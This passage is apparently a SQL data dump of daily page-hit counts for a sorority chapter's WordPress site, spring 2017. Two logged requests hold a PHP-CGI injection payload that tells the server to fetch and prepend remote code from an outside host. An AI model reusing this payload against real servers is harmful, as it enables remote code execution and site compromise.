'2017-03-13',1,883),('/ts_teams/ebony-cogdell/','2017-03-13',1,882),('/ts_teams/w-ruth-conway/','2017-03-13',1,881),('/ts_teams/cassandra-dorsey/','2017-03-13',1,880),('/ts_teams/maya-franklin/','2017-03-13',1,878),('/ts_teams/michele-franklin/','2017-03-13',1,877),('/ts_teams/quiyatta-gardner/','2017-03-13',1,876),('/ts_teams/sandra-hudson/','2017-03-13',1,875),('/ts_teams/angela-jefferson/','2017-03-13',1,874),('/ts_teams/ava-lawson/','2017-03-13',1,872),('/ts_teams/rose-matthews/','2017-03-13',1,870),('/ts_teams/helen-newman/','2017-03-13',1,868),('/ts_teams/linda-price/','2017-03-13',1,867),('/ts_teams/rosee-ragin/','2017-03-13',1,866),('/ts_teams/gloria-sanders/','2017-03-13',1,865),('/ts_teams/jontue-sumler/','2017-03-13',1,862),('/ts_teams/celia-worrell/','2017-03-13',1,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-03-13',1,828),('/download/aarc/','2017-03-13',1,991),('/download/constitution-by-laws/','2017-03-13',1,989),('/scholarship/application/','2017-03-13',5,804),('/scholarship','2017-03-13',1,797),('/programs/','2017-03-14',2,247),('/','2017-03-14',21,6),('/members/','2017-03-14',2,553),('/history/','2017-03-14',2,190),('/scholarship/','2017-03-14',10,797),('/scholarship/application/','2017-03-14',10,804),('/login','2017-03-14',1,549),('/login/','2017-03-14',1,549),('/','2017-03-15',24,6),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-03-15',1,657),('/scholarship/application/','2017-03-15',7,804),('/programs/','2017-03-15',1,247),('/history/','2017-03-15',3,190),('/scholarship/','2017-03-15',5,797),('/members/','2017-03-15',2,553),('/event/ms-walk-2017/','2017-03-15',2,1020),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-15',1,956),('/?clear=1','2017-03-16',1,6),('/','2017-03-16',18,6),('/scholarship','2017-03-16',4,797),('/scholarship/','2017-03-16',18,797),('/scholarship/application/','2017-03-16',13,804),('/','2017-03-17',28,6),('/scholarship/application/','2017-03-17',3,804),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-17',4,956),('/members/','2017-03-17',6,553),('/event/march-dimes-march-babies/','2017-03-17',2,1007),('/scholarship/','2017-03-17',7,797),('/programs/','2017-03-17',2,247),('/history/','2017-03-17',2,190),('/event/breakfast-on-the-go/','2017-03-17',2,493),('/login','2017-03-17',2,549),('/login/','2017-03-17',2,549),('/event/ms-walk-2017/','2017-03-17',2,1020),('/appa','2017-03-17',2,781),('/appa/','2017-03-17',2,781),('/ts_teams/lillet-williams-2/','2017-03-17',3,824),('/ts_teams/lillet-williams/','2017-03-17',2,823),('/ts_teams/cherice-daniel-2/','2017-03-17',2,825),('/ts_teams/constance-kinder/','2017-03-17',2,822),('/ts_teams/crystal-whitaker/','2017-03-17',2,816),('/ts_teams/tamika-r-daniels/','2017-03-17',2,814),('/ts_teams/angela-jefferson/','2017-03-17',2,874),('/ts_teams/kathy-ball/','2017-03-17',2,887),('/ts_teams/kalima-alawode/','2017-03-17',2,888),('/ts_teams/linda-brigmon/','2017-03-17',2,886),('/ts_teams/patreece-carter/','2017-03-17',2,885),('/ts_teams/jeaneathia-yerby-crowder/','2017-03-17',2,828),('/ts_teams/tamara-curtis/','2017-03-17',2,821),('/download/constitution-by-laws/','2017-03-17',2,989),('/download/aarc/','2017-03-17',2,991),('/ts_teams/christy-lewis/','2017-03-17',3,818),('/ts_teams/dawn-j-kemp/','2017-03-17',2,817),('/ts_teams/kathy-j-barrett/','2017-03-17',3,819),('/ts_teams/tracy-irvin/','2017-03-17',2,815),('/ts_slider/567/','2017-03-17',2,567),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-03-17',2,689),('/cause/scholarship/','2017-03-17',2,59),('/ts_teams/shanee-satchell/','2017-03-17',2,820),('/ts_teams/kristin-clark/','2017-03-17',2,883),('/ts_teams/gloria-sanders/','2017-03-17',2,865),('/ts_teams/ava-lawson/','2017-03-17',2,872),('/bog','2017-03-17',2,772),('/bog/','2017-03-17',2,772),('/ts_teams/celia-worrell/','2017-03-17',2,860),('/ts_teams/helen-newman/','2017-03-17',2,868),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-03-17',1,657),('/','2017-03-18',22,6),('/youth/','2017-03-18',1,738),('/scholarship/','2017-03-18',4,797),('/scholarship/application/','2017-03-18',1,804),('/login/','2017-03-18',1,549),('/members/','2017-03-18',1,553),('/','2017-03-19',43,6),('/membership/','2017-03-19',4,576),('/members/','2017-03-19',8,553),('/event/ms-walk-2017/','2017-03-19',4,1020),('/scholarship/','2017-03-19',3,797),('/history/','2017-03-19',1,190),('/event/march-dimes-march-babies/','2017-03-19',5,1007),('/event/ms-walk-2017','2017-03-19',1,1020),('/members','2017-03-19',1,553),('/event/breakfast-on-the-go','2017-03-19',1,493),('/event/breakfast-on-the-go/','2017-03-19',1,493),('/programs/','2017-03-19',3,247),('/appa','2017-03-19',5,781),('/appa/','2017-03-19',4,781),('/programs','2017-03-19',1,247),('/login','2017-03-19',1,549),('/login/','2017-03-19',1,549),('/cause/bring-water-children','2017-03-19',1,90),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-19',3,956),('/','2017-03-20',31,6),('/members/','2017-03-20',3,553),('/membership/','2017-03-20',2,576),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-03-20',1,657),('/event/march-dimes-march-babies/','2017-03-20',2,1007),('/scholarship/','2017-03-20',26,797),('/scholarship/application/','2017-03-20',20,804),('/scholarship','2017-03-20',6,797),('/login','2017-03-20',1,549),('/login/','2017-03-20',1,549),('/programs/','2017-03-20',1,247),('/history/','2017-03-20',2,190),('/scholarship/application','2017-03-20',1,804),('/event/march-dimes-march-babies/','2017-03-21',1,1007),('/scholarship/','2017-03-21',13,797),('/','2017-03-21',39,6),('/members/','2017-03-21',6,553),('/scholarship/application/','2017-03-21',17,804),('/scholarship','2017-03-21',2,797),('/event/breakfast-on-the-go/','2017-03-21',1,493),('/','2017-03-22',54,6),('/scholarship/application/','2017-03-22',18,804),('/scholarship/','2017-03-22',12,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-22',4,956),('/scholarship','2017-03-22',5,797),('/history/','2017-03-22',1,190),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-03-22',1,657),('/ts_teams/cassandra-dorsey/','2017-03-22',2,880),('/members/','2017-03-22',1,553),('/','2017-03-23',36,6),('/scholarship/','2017-03-23',12,797),('/scholarship/application/','2017-03-23',14,804),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-03-23',1,689),('/scholarship','2017-03-23',2,797),('/members/','2017-03-23',2,553),('/history/','2017-03-23',1,190),('/event/breakfast-on-the-go/','2017-03-23',1,493),('/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-03-23',1,6),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-03-23',1,6),('/programs/','2017-03-23',5,247),('/appa','2017-03-23',1,781),('/appa/','2017-03-23',1,781),('/bog','2017-03-23',1,772),('/bog/','2017-03-23',1,772),('/zen','2017-03-23',1,786),('/zen/','2017-03-23',1,786),('/','2017-03-24',42,6),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-03-24',2,657),('/scholarship/','2017-03-24',27,797),('/scholarship/application/','2017-03-24',28,804),('/scholarship','2017-03-24',5,797),('/members/','2017-03-24',4,553),('/login','2017-03-24',1,549),('/login/','2017-03-24',2,549),('/history/','2017-03-24',2,190),('/programs/','2017-03-24',3,247),('/event/ms-walk-2017/','2017-03-24',1,1020),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-24',2,956),('/youth','2017-03-24',1,738),('/youth/','2017-03-24',1,738),('/index.php','2017-03-24',2,6),('/','2017-03-25',39,6),('/login','2017-03-25',3,549),('/login/','2017-03-25',4,549),('/scholarship/','2017-03-25',6,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-25',6,956),('/scholarship/application/','2017-03-25',5,804),('/members/','2017-03-25',2,553),('/ts_teams/lillet-williams-2/','2017-03-25',1,824),('/','2017-03-26',30,6),('/scholarship/','2017-03-26',11,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-26',1,956),('/scholarship/application/','2017-03-26',10,804),('/members/','2017-03-26',4,553),('/history/','2017-03-26',2,190),('/','2017-03-27',39,6),('/history/','2017-03-27',1,190),('/members/','2017-03-27',1,553),('/programs/','2017-03-27',1,247),('/scholarship/','2017-03-27',14,797),('/event/ms-walk-2017/','2017-03-27',1,1020),('/event/breakfast-on-the-go/','2017-03-27',1,493),('/event/march-dimes-march-babies/','2017-03-27',1,1007),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-27',1,956),('/login','2017-03-27',1,549),('/ts_teams/cherice-daniel-2/','2017-03-27',1,825),('/ts_teams/lillet-williams-2/','2017-03-27',1,824),('/ts_teams/lillet-williams/','2017-03-27',1,823),('/ts_teams/constance-kinder/','2017-03-27',1,822),('/ts_teams/tamara-curtis/','2017-03-27',1,821),('/ts_teams/shanee-satchell/','2017-03-27',1,820),('/ts_teams/kathy-j-barrett/','2017-03-27',1,819),('/ts_teams/christy-lewis/','2017-03-27',1,818),('/ts_teams/dawn-j-kemp/','2017-03-27',1,817),('/ts_teams/crystal-whitaker/','2017-03-27',1,816),('/ts_teams/tracy-irvin/','2017-03-27',1,815),('/ts_teams/tamika-r-daniels/','2017-03-27',1,814),('/ts_teams/kalima-alawode/','2017-03-27',1,888),('/ts_teams/kathy-ball/','2017-03-27',1,887),('/ts_teams/linda-brigmon/','2017-03-27',1,886),('/ts_teams/patreece-carter/','2017-03-27',1,885),('/ts_teams/kristin-clark/','2017-03-27',1,883),('/ts_teams/ebony-cogdell/','2017-03-27',1,882),('/ts_teams/w-ruth-conway/','2017-03-27',1,881),('/ts_teams/cassandra-dorsey/','2017-03-27',1,880),('/ts_teams/maya-franklin/','2017-03-27',1,878),('/ts_teams/michele-franklin/','2017-03-27',1,877),('/ts_teams/quiyatta-gardner/','2017-03-27',1,876),('/ts_teams/sandra-hudson/','2017-03-27',1,875),('/ts_teams/angela-jefferson/','2017-03-27',1,874),('/ts_teams/ava-lawson/','2017-03-27',1,872),('/ts_teams/rose-matthews/','2017-03-27',1,870),('/ts_teams/helen-newman/','2017-03-27',1,868),('/ts_teams/linda-price/','2017-03-27',1,867),('/ts_teams/rosee-ragin/','2017-03-27',1,866),('/ts_teams/gloria-sanders/','2017-03-27',1,865),('/ts_teams/jontue-sumler/','2017-03-27',1,862),('/ts_teams/celia-worrell/','2017-03-27',1,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-03-27',1,828),('/login/','2017-03-27',1,549),('/download/aarc/','2017-03-27',1,991),('/download/constitution-by-laws/','2017-03-27',2,989),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-03-27',1,657),('/scholarship/application/','2017-03-27',11,804),('/scholarship','2017-03-27',4,797),('/','2017-03-28',41,6),('/programs/','2017-03-28',2,247),('/appa','2017-03-28',3,781),('/appa/','2017-03-28',4,781),('/scholarship','2017-03-28',9,797),('/scholarship/','2017-03-28',23,797),('/history','2017-03-28',1,190),('/history/','2017-03-28',1,190),('/members','2017-03-28',2,553),('/members/','2017-03-28',2,553),('/programs','2017-03-28',1,247),('/cause/bring-water-children','2017-03-28',1,90),('/event/ms-walk-2017','2017-03-28',1,1020),('/event/ms-walk-2017/','2017-03-28',1,1020),('/event/breakfast-on-the-go','2017-03-28',1,493),('/event/breakfast-on-the-go/','2017-03-28',1,493),('/event/march-dimes-march-babies','2017-03-28',1,1007),('/event/march-dimes-march-babies/','2017-03-28',1,1007),('/lgz-celebrates-35-years-service-howard-county-md','2017-03-28',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-28',1,956),('/login','2017-03-28',1,549),('/login/','2017-03-28',1,549),('/ts_teams/cherice-daniel-2','2017-03-28',1,825),('/ts_teams/cherice-daniel-2/','2017-03-28',1,825),('/ts_teams/lillet-williams-2','2017-03-28',1,824),('/ts_teams/lillet-williams-2/','2017-03-28',1,824),('/ts_teams/lillet-williams','2017-03-28',1,823),('/ts_teams/lillet-williams/','2017-03-28',1,823),('/ts_teams/constance-kinder','2017-03-28',1,822),('/ts_teams/constance-kinder/','2017-03-28',1,822),('/ts_teams/tamara-curtis','2017-03-28',1,821),('/ts_teams/tamara-curtis/','2017-03-28',1,821),('/ts_teams/shanee-satchell','2017-03-28',1,820),('/ts_teams/shanee-satchell/','2017-03-28',1,820),('/ts_teams/kathy-j-barrett','2017-03-28',1,819),('/ts_teams/kathy-j-barrett/','2017-03-28',1,819),('/ts_teams/christy-lewis','2017-03-28',1,818),('/ts_teams/christy-lewis/','2017-03-28',1,818),('/ts_teams/dawn-j-kemp','2017-03-28',2,817),('/ts_teams/dawn-j-kemp/','2017-03-28',2,817),('/ts_teams/crystal-whitaker','2017-03-28',1,816),('/ts_teams/crystal-whitaker/','2017-03-28',1,816),('/ts_teams/tracy-irvin','2017-03-28',1,815),('/ts_teams/tracy-irvin/','2017-03-28',1,815),('/ts_teams/tamika-r-daniels','2017-03-28',1,814),('/ts_teams/tamika-r-daniels/','2017-03-28',1,814),('/ts_teams/kalima-alawode','2017-03-28',1,888),('/ts_teams/kalima-alawode/','2017-03-28',1,888),('/ts_teams/kathy-ball','2017-03-28',1,887),('/ts_teams/kathy-ball/','2017-03-28',1,887),('/ts_teams/linda-brigmon','2017-03-28',1,886),('/ts_teams/linda-brigmon/','2017-03-28',1,886),('/ts_teams/patreece-carter','2017-03-28',1,885),('/ts_teams/patreece-carter/','2017-03-28',1,885),('/ts_teams/kristin-clark','2017-03-28',1,883),('/ts_teams/kristin-clark/','2017-03-28',1,883),('/ts_teams/ebony-cogdell','2017-03-28',1,882),('/ts_teams/ebony-cogdell/','2017-03-28',1,882),('/ts_teams/w-ruth-conway','2017-03-28',1,881),('/ts_teams/w-ruth-conway/','2017-03-28',1,881),('/ts_teams/cassandra-dorsey','2017-03-28',1,880),('/ts_teams/cassandra-dorsey/','2017-03-28',1,880),('/ts_teams/maya-franklin','2017-03-28',1,878),('/ts_teams/maya-franklin/','2017-03-28',1,878),('/ts_teams/michele-franklin','2017-03-28',1,877),('/ts_teams/michele-franklin/','2017-03-28',1,877),('/ts_teams/quiyatta-gardner','2017-03-28',1,876),('/ts_teams/quiyatta-gardner/','2017-03-28',1,876),('/ts_teams/sandra-hudson','2017-03-28',1,875),('/ts_teams/sandra-hudson/','2017-03-28',1,875),('/ts_teams/angela-jefferson','2017-03-28',1,874),('/ts_teams/angela-jefferson/','2017-03-28',1,874),('/ts_teams/ava-lawson','2017-03-28',1,872),('/ts_teams/ava-lawson/','2017-03-28',1,872),('/ts_teams/rose-matthews','2017-03-28',1,870),('/ts_teams/rose-matthews/','2017-03-28',1,870),('/ts_teams/helen-newman','2017-03-28',1,868),('/ts_teams/helen-newman/','2017-03-28',1,868),('/ts_teams/linda-price','2017-03-28',1,867),('/ts_teams/linda-price/','2017-03-28',1,867),('/ts_teams/rosee-ragin','2017-03-28',1,866),('/ts_teams/rosee-ragin/','2017-03-28',1,866),('/ts_teams/gloria-sanders','2017-03-28',1,865),('/ts_teams/gloria-sanders/','2017-03-28',1,865),('/ts_teams/jontue-sumler','2017-03-28',1,862),('/ts_teams/jontue-sumler/','2017-03-28',1,862),('/ts_teams/celia-worrell','2017-03-28',1,860),('/ts_teams/celia-worrell/','2017-03-28',1,860),('/ts_teams/jeaneathia-yerby-crowder','2017-03-28',1,828),('/ts_teams/jeaneathia-yerby-crowder/','2017-03-28',1,828),('/youth','2017-03-28',1,738),('/youth/','2017-03-28',1,738),('/bog','2017-03-28',1,772),('/bog/','2017-03-28',1,772),('/zen','2017-03-28',1,786),('/zen/','2017-03-28',1,786),('/scholarship/application/','2017-03-28',16,804),('/download/aarc','2017-03-28',1,991),('/download/aarc/','2017-03-28',1,991),('/download/constitution-by-laws','2017-03-28',1,989),('/download/constitution-by-laws/','2017-03-28',1,989),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years','2017-03-28',1,689),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-03-28',1,689),('/ts_slider/567','2017-03-28',1,567),('/ts_slider/567/','2017-03-28',1,567),('/cause/scholarship','2017-03-28',1,59),('/cause/scholarship/','2017-03-28',3,59),('/','2017-03-29',46,6),('/scholarship/application/','2017-03-29',14,804),('/scholarship/','2017-03-29',17,797),('/ts_teams/constance-kinder/','2017-03-29',2,822),('/scholarship','2017-03-29',2,797),('/ts_teams/dawn-j-kemp/','2017-03-29',1,817),('/login','2017-03-29',1,549),('/login/','2017-03-29',2,549),('/ts_teams/crystal-whitaker/','2017-03-29',1,816),('/','2017-03-30',28,6),('//?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://chirurgia-obezitatii.ro/go.txt','2017-03-30',1,6),('/scholarship/','2017-03-30',33,797),('/scholarship/application/','2017-03-30',24,804),('/scholarship','2017-03-30',8,797),('/login','2017-03-30',1,549),('/login/','2017-03-30',1,549),('/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-03-30',1,6),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-03-30',1,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-30',4,956),('/event/ms-walk-2017/','2017-03-30',1,1020),('/','2017-03-31',34,6),('/programs/','2017-03-31',2,247),('/members/','2017-03-31',6,553),('/event/ms-walk-2017/','2017-03-31',5,1020),('/scholarship/','2017-03-31',18,797),('/history/','2017-03-31',3,190),('/event/breakfast-on-the-go/','2017-03-31',2,493),('/bog','2017-03-31',1,772),('/appa','2017-03-31',1,781),('/youth','2017-03-31',1,738),('/zen','2017-03-31',1,786),('/ts_teams/kathy-j-barrett/','2017-03-31',2,819),('/ts_teams/shanee-satchell/','2017-03-31',2,820),('/ts_teams/christy-lewis/','2017-03-31',2,818),('/ts_teams/constance-kinder/','2017-03-31',2,822),('/ts_teams/lillet-williams/','2017-03-31',2,823),('/ts_teams/tracy-irvin/','2017-03-31',2,815),('/ts_teams/kathy-ball/','2017-03-31',2,887),('/ts_teams/dawn-j-kemp/','2017-03-31',2,817),('/members/feed/','2017-03-31',1,553),('/ts_teams/cherice-daniel-2/','2017-03-31',2,825),('/ts_teams/patreece-carter/','2017-03-31',2,885),('/login','2017-03-31',2,549),('/login/','2017-03-31',4,549),('/ts_teams/crystal-whitaker/','2017-03-31',2,816),('/ts_teams/linda-brigmon/','2017-03-31',2,886),('/ts_teams/lillet-williams-2/','2017-03-31',2,824),('/ts_teams/tamara-curtis/','2017-03-31',2,821),('/ts_teams/kalima-alawode/','2017-03-31',4,888),('/ts_teams/tamika-r-daniels/','2017-03-31',2,814),('/event/march-dimes-march-babies/','2017-03-31',2,1007),('/login/feed/','2017-03-31',1,549),('/ts_teams/jeaneathia-yerby-crowder/','2017-03-31',2,828),('/ts_slider/567/','2017-03-31',1,567),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-03-31',1,689),('/scholarship','2017-03-31',3,797),('/scholarship/application/','2017-03-31',8,804),('/appa/','2017-03-31',1,781),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-31',16,956),('/','2017-04-01',22,6),('/membership/','2017-04-01',3,576),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-01',19,956),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-04-01',1,657),('/history/','2017-04-01',2,190),('/members/','2017-04-01',3,553),('/programs/','2017-04-01',2,247),('/scholarship/','2017-04-01',3,797),('/event/ms-walk-2017/','2017-04-01',1,1020),('/event/breakfast-on-the-go/','2017-04-01',2,493),('/event/march-dimes-march-babies/','2017-04-01',2,1007),('/scholarship/application/','2017-04-01',1,804),('/login','2017-04-01',1,549),('/login/','2017-04-01',1,549),('/history/','2017-04-02',3,190),('/members/','2017-04-02',3,553),('/programs/','2017-04-02',3,247),('/scholarship/','2017-04-02',4,797),('/','2017-04-02',24,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-02',29,956),('/event/ms-walk-2017/','2017-04-02',1,1020),('/event/breakfast-on-the-go/','2017-04-02',1,493),('/event/march-dimes-march-babies/','2017-04-02',2,1007),('/login','2017-04-02',4,549),('/login/','2017-04-02',4,549),('/scholarship/application/','2017-04-02',4,804),('/','2017-04-03',19,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-03',15,956),('/scholarship/','2017-04-03',3,797),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-04-03',1,657),('/appa/','2017-04-03',1,781),('/members/','2017-04-03',1,553),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-04',24,956),('/','2017-04-04',18,6),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-04-04',1,689),('/scholarship/','2017-04-04',3,797),('/scholarship/application/','2017-04-04',7,804),('/members/','2017-04-04',7,553),('/programs/','2017-04-04',1,247),('/history/','2017-04-04',1,190),('/appa/','2017-04-04',1,781),('/login','2017-04-04',2,549),('/login/','2017-04-04',2,549),('/','2017-04-05',19,6),('/members/','2017-04-05',5,553),('/login','2017-04-05',3,549),('/login/','2017-04-05',3,549),('/programs/','2017-04-05',2,247),('/youth','2017-04-05',2,738),('/youth/','2017-04-05',2,738),('/scholarship/','2017-04-05',1,797),('/scholarship/application/','2017-04-05',2,804),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-05',10,956),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-06',19,956),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-04-06',1,657),('/','2017-04-06',29,6),('/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://chirurgia-obezitatii.ro/go.txt','2017-04-06',1,6),('/login','2017-04-06',1,549),('/event/ms-walk-2017/','2017-04-06',2,1020),('/login/','2017-04-06',1,549),('/scholarship/','2017-04-06',5,797),('/members/','2017-04-06',4,553),('/event/march-dimes-march-babies/','2017-04-06',1,1007),('/programs/','2017-04-06',2,247),('/event/breakfast-on-the-go/','2017-04-06',1,493),('/ts_teams/crystal-whitaker/','2017-04-06',1,816),('/scholarship/application/','2017-04-06',1,804),('/history/','2017-04-06',1,190),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-07',17,956),('/members/','2017-04-07',3,553),('/login','2017-04-07',2,549),('/login/','2017-04-07',2,549),('/','2017-04-07',11,6),('/scholarship/application/','2017-04-07',5,804),('/ts_teams/gloria-sanders/','2017-04-07',1,865),('/scholarship/','2017-04-07',1,797),('/','2017-04-08',22,6),('/cause/scholarship/','2017-04-08',1,59),('/scholarship/','2017-04-08',8,797),('/history/','2017-04-08',2,190),('/programs/','2017-04-08',1,247),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-08',15,956),('/scholarship/application/','2017-04-08',2,804),('/event/ms-walk-2017','2017-04-08',1,1020),('/event/ms-walk-2017/','2017-04-08',1,1020),('/cause/scholarship/','2017-04-09',2,59),('/history/','2017-04-09',3,190),('/scholarship/','2017-04-09',10,797),('/','2017-04-09',30,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-09',27,956),('/login','2017-04-09',3,549),('/event/ms-walk-2017/','2017-04-09',1,1020),('/login/','2017-04-09',3,549),('/members/','2017-04-09',1,553),('/event/march-dimes-march-babies/','2017-04-09',1,1007),('/programs/','2017-04-09',2,247),('/event/breakfast-on-the-go/','2017-04-09',1,493),('/ts_teams/tamika-r-daniels/','2017-04-09',1,814),('/ts_teams/lillet-williams/','2017-04-09',1,823),('/ts_teams/rose-matthews/','2017-04-09',1,870),('/youth','2017-04-09',1,738),('/youth/','2017-04-09',1,738),('/ts_teams/kristin-clark/','2017-04-09',3,883),('/ts_teams/gloria-sanders/','2017-04-10',3,865),('/','2017-04-10',17,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-10',30,956),('/history/','2017-04-10',2,190),('/members/','2017-04-10',2,553),('/programs/','2017-04-10',2,247),('/scholarship/','2017-04-10',3,797),('/event/ms-walk-2017/','2017-04-10',2,1020),('/event/breakfast-on-the-go/','2017-04-10',2,493),('/event/march-dimes-march-babies/','2017-04-10',3,1007),('/login','2017-04-10',2,549),('/ts_teams/cherice-daniel-2/','2017-04-10',2,825),('/ts_teams/lillet-williams-2/','2017-04-10',1,824),('/ts_teams/lillet-williams/','2017-04-10',2,823),('/ts_teams/constance-kinder/','2017-04-10',2,822),('/ts_teams/tamara-curtis/','2017-04-10',1,821),('/ts_teams/shanee-satchell/','2017-04-10',1,820),('/ts_teams/kathy-j-barrett/','2017-04-10',1,819),('/ts_teams/christy-lewis/','2017-04-10',1,818),('/ts_teams/dawn-j-kemp/','2017-04-10',1,817),('/ts_teams/crystal-whitaker/','2017-04-10',1,816),('/ts_teams/tracy-irvin/','2017-04-10',1,815),('/ts_teams/tamika-r-daniels/','2017-04-10',1,814),('/ts_teams/kalima-alawode/','2017-04-10',2,888),('/ts_teams/kathy-ball/','2017-04-10',1,887),('/ts_teams/linda-brigmon/','2017-04-10',1,886),('/ts_teams/patreece-carter/','2017-04-10',1,885),('/ts_teams/kristin-clark/','2017-04-10',4,883),('/ts_teams/ebony-cogdell/','2017-04-10',1,882),('/ts_teams/w-ruth-conway/','2017-04-10',1,881),('/ts_teams/cassandra-dorsey/','2017-04-10',1,880),('/ts_teams/maya-franklin/','2017-04-10',1,878),('/ts_teams/michele-franklin/','2017-04-10',1,877),('/ts_teams/quiyatta-gardner/','2017-04-10',1,876),('/ts_teams/sandra-hudson/','2017-04-10',2,875),('/ts_teams/angela-jefferson/','2017-04-10',2,874),('/ts_teams/ava-lawson/','2017-04-10',2,872),('/ts_teams/rose-matthews/','2017-04-10',1,870),('/ts_teams/helen-newman/','2017-04-10',1,868),('/ts_teams/linda-price/','2017-04-10',1,867),('/ts_teams/rosee-ragin/','2017-04-10',1,866),('/ts_teams/jontue-sumler/','2017-04-10',1,862),('/ts_teams/celia-worrell/','2017-04-10',1,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-04-10',2,828),('/login/','2017-04-10',2,549),('/download/aarc/','2017-04-10',2,991),('/download/constitution-by-laws/','2017-04-10',1,989),('/scholarship/application/','2017-04-10',2,804),('/lgz-celebrates-35-years-service-howard-county-md/feed/','2017-04-10',1,956),('/login/feed/','2017-04-10',1,549),('/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-04-10',1,6),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-04-10',1,6),('/youth','2017-04-10',1,738),('/youth/','2017-04-10',1,738),('/zen','2017-04-10',1,786),('/zen/','2017-04-10',1,786),('/','2017-04-11',13,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-11',17,956),('/user/','2017-04-11',1,547),('/scholarship/','2017-04-11',2,797),('/scholarship/application/','2017-04-11',4,804),('/ts_teams/gloria-sanders/','2017-04-11',1,865),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-12',20,956),('/','2017-04-12',22,6),('/scholarship/','2017-04-12',2,797),('/members/','2017-04-12',2,553),('/programs/','2017-04-12',2,247),('/appa','2017-04-12',1,781),('/appa/','2017-04-12',1,781),('/login','2017-04-12',2,549),('/login/','2017-04-12',3,549),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-13',24,956),('/','2017-04-13',11,6),('/appa/','2017-04-13',1,781),('/ts_teams/gloria-sanders/','2017-04-13',1,865),('/membership/','2017-04-13',3,576),('/ts_teams/cherice-daniel-2/','2017-04-13',3,825),('/programs/','2017-04-13',1,247),('/membership/','2017-04-14',3,576),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-14',20,956),('/','2017-04-14',13,6),('/event/breakfast-on-the-go/','2017-04-14',1,493),('/event/march-dimes-march-babies/','2017-04-14',1,1007),('/scholarship/','2017-04-14',1,797),('/members/','2017-04-14',2,553),('/ts_teams/cherice-daniel-2/','2017-04-14',1,825),('/history/','2017-04-14',1,190),('/','2017-04-15',25,6),('/event/breakfast-on-the-go/','2017-04-15',2,493),('/event/march-dimes-march-babies/','2017-04-15',4,1007),('/scholarship/','2017-04-15',9,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-15',22,956),('/login','2017-04-15',1,549),('/login/','2017-04-15',1,549),('/history/','2017-04-15',1,190),('/scholarship','2017-04-15',2,797),('/membership/','2017-04-15',3,576),('/appa/','2017-04-15',1,781),('/programs/','2017-04-15',2,247),('/lgz-celebrates-35-years-service-howard-county-md/','2017-04-16',5,956),('/','2017-04-16',16,6),('/membership/','2017-04-16',2,576),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-04-16',1,657),('/','2017-04-17',74,6),('/membership/','2017-04-17',1,576),('/event/march-dimes-march-babies/','2017-04-17',2,1007),('/members/','2017-04-17',4,553),('/scholarship/','2017-04-17',8,797),('/programs/','2017-04-17',3,247),('/youth','2017-04-17',1,738),('/youth/','2017-04-17',1,738),('/scholarship','2017-04-17',1,797),('/cause/scholarship/','2017-04-17',1,59),('/','2017-04-18',40,6),('/membership/','2017-04-18',3,576),('/programs/','2017-04-18',1,247),('/login','2017-04-18',1,549),('/login/','2017-04-18',1,549),('/scholarship/','2017-04-18',3,797),('/','2017-04-19',41,6),('/cause/scholars